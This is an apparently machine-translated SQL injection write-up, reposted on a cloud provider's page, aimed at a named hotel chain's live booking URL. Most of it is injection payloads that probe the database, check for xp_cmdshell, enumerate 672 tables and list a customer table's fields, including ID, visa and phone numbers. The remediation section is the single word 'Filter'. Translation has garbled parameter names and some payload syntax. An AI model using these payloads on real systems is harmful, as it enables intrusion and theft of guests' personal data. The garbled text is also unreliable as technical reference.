Home > Cloud Computing > Cloud Security

SQL injection vulnerability in a substation of GreenTree Inn

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

SQL injection vulnerability in a substation of GreenTree Inn

A substation of GreenTree Inn SQL injection vulnerability http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx? Country code = 531001


Enter 'and '1' = '1

Enter 'and '1' = '2

View database version
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx
? Response code = 531001 'and 1 = (select @ VERSION) and '1' = '1

Current Database Name

Local service name


24 Databases
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx
? Response code = 531001 'and 24 = (select count (name) from master. dbo. sysdatabases) and '1' = '1

XP_CMDSHELL exists
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx?
Repeated code = 531001 'and 1 = (Select count (name) FROM master. dbo. sysobjects Where xtype = 'X' AND name = 'xp _ Your shell') and '1' = '1

XP_regread extended stored procedure exists

Explosive table
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx?
Export Code = 531001 'and 1 = (select top 1 name from sysobjects where xtype = 'U') and '1' = '1


Select top 1 name from sysobjects where xtype = 'U' and name not in ('turnstable', 'crscount ')
Select top 1 name from sysobjects where xtype = 'U' and name not in ('turnstable', 'crscount ', 'blacklist ')
Select top 1 name from sysobjects where xtype = 'U' and name not in ('turnstable', 'crscount ', 'blacklist', 'iccard _ request ','m _ initrebate ', 'customer ')
A total of 672 tables are not listed here.
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx?
Export Code = 531001 'and 672 = (select count (name) from sysobjects where xtype = 'U') and '1' = '1

The table field here uses the Customer as an example for 39 Fields

As follows:
CustomerCode
FirstName
LastName
MiddleName
NickName
Gender
Birthday
NationalityID
Race
Title
Language1
Language2
CustomerTypeID
TravelAgentID
CustomerOrigin
Region1
Region2
Note1
Note2
Company
Address
Telephone
Zip
VisaID
ExpirationDate
IDTypeID
IDNumber
VIPLevel
VIPNumber
CreateDate
UploadFlag
Priority
Mobile
CompanyTel
CompanyFax
MemberType
MemberNo
UploadDate
Response Code
View a field
Http://system.greentree.com.cn: 8080/frontinvest/roomdetail. aspx
? Response code = 531001 'and 1 = (select top 1 FirstName from Customer) and '1' = '1

Solution:

Filter

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More